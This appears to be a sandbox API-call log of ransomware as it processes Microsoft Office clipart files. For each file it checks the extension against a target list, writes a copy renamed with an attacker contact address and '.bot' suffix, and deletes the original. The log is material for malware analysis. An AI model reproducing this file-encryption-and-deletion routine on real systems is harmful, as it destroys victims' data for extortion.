	[0140.776] lstrlenW (lpString=".docx") returned 5
	[0140.776] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.776] lstrlenW (lpString=".pdf") returned 4
	[0140.776] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.776] lstrlenW (lpString=".xls") returned 4
	[0140.776] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.776] lstrlenW (lpString=".xlsx") returned 5
	[0140.776] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.776] lstrlenW (lpString=".ppt") returned 4
	[0140.776] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63
	[0140.776] lstrlenW (lpString=".zip") returned 4
	[0140.776] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.776] lstrlenW (lpString=".rar") returned 4
	[0140.776] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.777] lstrlenW (lpString=".bz2") returned 4
	[0140.777] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.777] lstrlenW (lpString=".7z") returned 3
	[0140.777] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63
	[0140.777] lstrlenW (lpString=".dbf") returned 4
	[0140.777] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63
	[0140.777] lstrlenW (lpString=".1cd") returned 4
	[0140.777] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63
	[0140.777] lstrlenW (lpString=".jpg") returned 4
	[0140.777] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.777] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0140.777] lstrlenW (lpString="BD10972_.GIF") returned 12
	[0140.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.790] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=20189) returned 1
	[0140.790] CloseHandle (hObject=0x31c) returned 1
	[0140.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif")) returned 0x20
	[0140.791] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.792] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.792] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0140.793] GetLastError () returned 0x0
	[0140.793] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x4edd, lpOverlapped=0x0) returned 1
	[0140.796] WriteFile (in: hFile=0x3bc, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x4ee0, lpOverlapped=0x0) returned 1
	[0140.798] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.798] WriteFile (in: hFile=0x3bc, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.798] SetEndOfFile (hFile=0x3bc) returned 1
	[0140.798] CloseHandle (hObject=0x3bc) returned 1
	[0140.798] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.798] SetEndOfFile (hFile=0x31c) returned 1
	[0140.832] CloseHandle (hObject=0x31c) returned 1
	[0140.832] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.906] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif")) returned 1
	[0140.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63
	[0140.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63
	[0140.907] lstrlenW (lpString=".doc") returned 4
	[0140.907] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0140.907] lstrlenW (lpString=".docx") returned 5
	[0140.907] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0140.907] lstrlenW (lpString=".pdf") returned 4
	[0140.907] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0140.907] lstrlenW (lpString=".xls") returned 4
	[0140.907] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0140.907] lstrlenW (lpString=".xlsx") returned 5
	[0140.907] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0140.907] lstrlenW (lpString=".ppt") returned 4
	[0140.907] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0140.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63
	[0140.907] lstrlenW (lpString=".zip") returned 4
	[0140.907] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0140.907] lstrlenW (lpString=".rar") returned 4
	[0140.907] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0140.907] lstrlenW (lpString=".bz2") returned 4
	[0140.907] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0140.908] lstrlenW (lpString=".7z") returned 3
	[0140.908] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0140.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63
	[0140.908] lstrlenW (lpString=".dbf") returned 4
	[0140.908] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0140.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63
	[0140.908] lstrlenW (lpString=".1cd") returned 4
	[0140.908] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0140.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63
	[0140.908] lstrlenW (lpString=".jpg") returned 4
	[0140.908] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0140.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63
	[0140.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63
	[0140.908] lstrlenW (lpString=".doc") returned 4
	[0140.908] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0140.908] lstrlenW (lpString=".docx") returned 5
	[0140.908] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0140.908] lstrlenW (lpString=".pdf") returned 4
	[0140.908] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0140.908] lstrlenW (lpString=".xls") returned 4
	[0140.908] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0140.908] lstrlenW (lpString=".xlsx") returned 5
	[0140.908] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0140.908] lstrlenW (lpString=".ppt") returned 4
	[0140.908] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0140.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63
	[0140.908] lstrlenW (lpString=".zip") returned 4
	[0140.908] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0140.908] lstrlenW (lpString=".rar") returned 4
	[0140.908] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0140.908] lstrlenW (lpString=".bz2") returned 4
	[0140.908] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0140.909] lstrlenW (lpString=".7z") returned 3
	[0140.909] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0140.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63
	[0140.909] lstrlenW (lpString=".dbf") returned 4
	[0140.909] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0140.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63
	[0140.909] lstrlenW (lpString=".1cd") returned 4
	[0140.909] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0140.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63
	[0140.909] lstrlenW (lpString=".jpg") returned 4
	[0140.909] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0140.909] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0140.909] lstrlenW (lpString="BD19582_.GIF") returned 12
	[0140.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.914] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=15733) returned 1
	[0140.914] CloseHandle (hObject=0x3a0) returned 1
	[0140.914] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif")) returned 0x20
	[0140.971] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0141.013] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.013] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.025] GetLastError () returned 0x0
	[0141.025] ReadFile (in: hFile=0x3bc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x3d75, lpOverlapped=0x0) returned 1
	[0141.060] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x3d80, lpOverlapped=0x0) returned 1
	[0141.062] ReadFile (in: hFile=0x3bc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.062] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.062] SetEndOfFile (hFile=0x3ac) returned 1
	[0141.062] CloseHandle (hObject=0x3ac) returned 1
	[0141.062] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.062] SetEndOfFile (hFile=0x3bc) returned 1
	[0141.064] CloseHandle (hObject=0x3bc) returned 1
	[0141.064] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.065] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif")) returned 1
	[0141.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63
	[0141.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63
	[0141.065] lstrlenW (lpString=".doc") returned 4
	[0141.065] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0141.065] lstrlenW (lpString=".docx") returned 5
	[0141.065] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0141.065] lstrlenW (lpString=".pdf") returned 4
	[0141.065] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0141.065] lstrlenW (lpString=".xls") returned 4
	[0141.065] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0141.065] lstrlenW (lpString=".xlsx") returned 5
	[0141.065] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0141.065] lstrlenW (lpString=".ppt") returned 4
	[0141.066] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0141.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63
	[0141.066] lstrlenW (lpString=".zip") returned 4
	[0141.066] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0141.066] lstrlenW (lpString=".rar") returned 4
	[0141.066] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0141.066] lstrlenW (lpString=".bz2") returned 4
	[0141.066] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0141.066] lstrlenW (lpString=".7z") returned 3
	[0141.066] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0141.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63
	[0141.066] lstrlenW (lpString=".dbf") returned 4
	[0141.066] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0141.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63
	[0141.066] lstrlenW (lpString=".1cd") returned 4
	[0141.066] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0141.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63
	[0141.066] lstrlenW (lpString=".jpg") returned 4
	[0141.066] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0141.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63
	[0141.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63
	[0141.066] lstrlenW (lpString=".doc") returned 4
	[0141.066] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0141.066] lstrlenW (lpString=".docx") returned 5
	[0141.066] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0141.066] lstrlenW (lpString=".pdf") returned 4
	[0141.066] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0141.066] lstrlenW (lpString=".xls") returned 4
	[0141.066] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0141.066] lstrlenW (lpString=".xlsx") returned 5
	[0141.066] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0141.066] lstrlenW (lpString=".ppt") returned 4
	[0141.066] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0141.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63
	[0141.067] lstrlenW (lpString=".zip") returned 4
	[0141.067] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0141.067] lstrlenW (lpString=".rar") returned 4
	[0141.067] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0141.067] lstrlenW (lpString=".bz2") returned 4
	[0141.067] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0141.067] lstrlenW (lpString=".7z") returned 3
	[0141.067] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0141.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63
	[0141.067] lstrlenW (lpString=".dbf") returned 4
	[0141.067] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0141.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63
	[0141.067] lstrlenW (lpString=".1cd") returned 4
	[0141.067] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0141.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63
	[0141.067] lstrlenW (lpString=".jpg") returned 4
	[0141.067] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0141.067] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.067] lstrlenW (lpString="BD19828_.WMF") returned 12
	[0141.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.099] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=8772) returned 1
	[0141.099] CloseHandle (hObject=0x3ac) returned 1
	[0141.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf")) returned 0x20
	[0141.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.100] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.100] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0141.101] GetLastError () returned 0x0
	[0141.101] ReadFile (in: hFile=0x3ac, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2244, lpOverlapped=0x0) returned 1
	[0141.104] WriteFile (in: hFile=0x3c0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2250, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2250, lpOverlapped=0x0) returned 1
	[0141.105] ReadFile (in: hFile=0x3ac, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.105] WriteFile (in: hFile=0x3c0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.105] SetEndOfFile (hFile=0x3c0) returned 1
	[0141.105] CloseHandle (hObject=0x3c0) returned 1
	[0141.105] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.105] SetEndOfFile (hFile=0x3ac) returned 1
	[0141.109] CloseHandle (hObject=0x3ac) returned 1
	[0141.109] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.109] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf")) returned 1
	[0141.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63
	[0141.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63
	[0141.110] lstrlenW (lpString=".doc") returned 4
	[0141.110] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.110] lstrlenW (lpString=".docx") returned 5
	[0141.110] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.110] lstrlenW (lpString=".pdf") returned 4
	[0141.110] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.110] lstrlenW (lpString=".xls") returned 4
	[0141.110] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.110] lstrlenW (lpString=".xlsx") returned 5
	[0141.110] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.110] lstrlenW (lpString=".ppt") returned 4
	[0141.110] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63
	[0141.110] lstrlenW (lpString=".zip") returned 4
	[0141.110] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.110] lstrlenW (lpString=".rar") returned 4
	[0141.110] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.110] lstrlenW (lpString=".bz2") returned 4
	[0141.110] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.110] lstrlenW (lpString=".7z") returned 3
	[0141.110] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63
	[0141.110] lstrlenW (lpString=".dbf") returned 4
	[0141.110] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63
	[0141.110] lstrlenW (lpString=".1cd") returned 4
	[0141.110] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63
	[0141.111] lstrlenW (lpString=".jpg") returned 4
	[0141.111] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63
	[0141.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63
	[0141.111] lstrlenW (lpString=".doc") returned 4
	[0141.111] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.111] lstrlenW (lpString=".docx") returned 5
	[0141.111] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.111] lstrlenW (lpString=".pdf") returned 4
	[0141.111] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.111] lstrlenW (lpString=".xls") returned 4
